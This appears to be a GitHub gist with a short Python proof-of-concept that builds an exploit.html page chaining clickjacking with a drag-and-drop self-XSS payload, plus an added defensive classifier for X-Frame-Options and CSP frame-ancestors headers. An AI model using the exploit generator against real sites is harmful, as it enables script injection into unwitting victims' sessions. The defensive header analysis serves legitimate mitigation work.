@vishwaraj /cxp.py
Last active Jul 26, 2017

clickjack to xss poc
print("Clickjack to Xss")
vector = input('xss vector--> ')  # xss payload
html = input('Custom Iframe Code--> ')  # custom iframe code
# draggable element whose drag data carries the payload text
source_code = """<html><body>
<h1>Clickjack to exploit self xss </h1>
<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', '%s')"><h3>DRAG ME!!</h3></div>
""" % (vector)
# write the drag source, the iframe markup and the closing tags, then close the file
with open('exploit.html', 'w') as fo:
    fo.write(source_code)
    fo.write(html)
    fo.write('</body></html>')
print("file created")
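
The PoC only works if the target page renders inside a third-party iframe, so the target-side mitigation is an anti-framing header. The following is an added example, not part of the original gist: it classifies a response's `X-Frame-Options` and CSP `frame-ancestors` headers using the HTML Standard's precedence rules. The function names and the sample headers are constructed for illustration.

```python
# Added example: classify anti-framing headers as seen by a cross-origin parent.
BLOCKED, RESTRICTED, FRAMEABLE = "blocked", "restricted", "frameable"

def frame_ancestors(policy):
    """Return the frame-ancestors source list of one CSP policy, or None."""
    for directive in policy.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]
    return None

def classify_sources(sources):
    if not sources or sources == ["'none'"]:
        return BLOCKED                  # an empty list behaves like 'none'
    if any(s == "*" or s.endswith(":") for s in sources):
        return FRAMEABLE                # wildcard or bare scheme such as https:
    return RESTRICTED                   # 'self' or an explicit host list

def framing_verdict(headers):
    """headers: (name, value) pairs of one response. Returns a verdict string."""
    csp, xfo = [], set()
    for name, value in headers:
        if name.lower() == "content-security-policy":
            # A comma-joined value carries several independent policies.
            for policy in value.split(","):
                sources = frame_ancestors(policy)
                if sources is not None:
                    csp.append(classify_sources(sources))
        elif name.lower() == "x-frame-options":
            xfo |= {v.strip().lower() for v in value.split(",") if v.strip()}
    if csp:
        # An enforced frame-ancestors makes browsers skip X-Frame-Options;
        # every policy must allow the parent, so the strictest verdict wins.
        return next(v for v in (BLOCKED, RESTRICTED, FRAMEABLE) if v in csp)
    if len(xfo) > 1:
        # Conflicting values block when a recognised one is among them.
        return BLOCKED if xfo & {"deny", "sameorigin", "allowall"} else FRAMEABLE
    if xfo == {"deny"}:
        return BLOCKED
    if xfo == {"sameorigin"}:
        return RESTRICTED
    return FRAMEABLE                    # missing, ALLOW-FROM or unknown value

# Constructed sample response (not captured from any real site).
SAMPLE = [("X-Frame-Options", "ALLOW-FROM https://partner.example"),
          ("Content-Security-Policy", "default-src 'self'")]

if __name__ == "__main__":
    print(framing_verdict(SAMPLE))
```

A `frameable` verdict on a page that accepts dropped text into a field reflected without encoding is the condition this PoC depends on; `frame-ancestors 'none'` or `'self'` removes it.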
vishwaraj commented Apr 12, 2016

You can see a working PoC here: Blog link
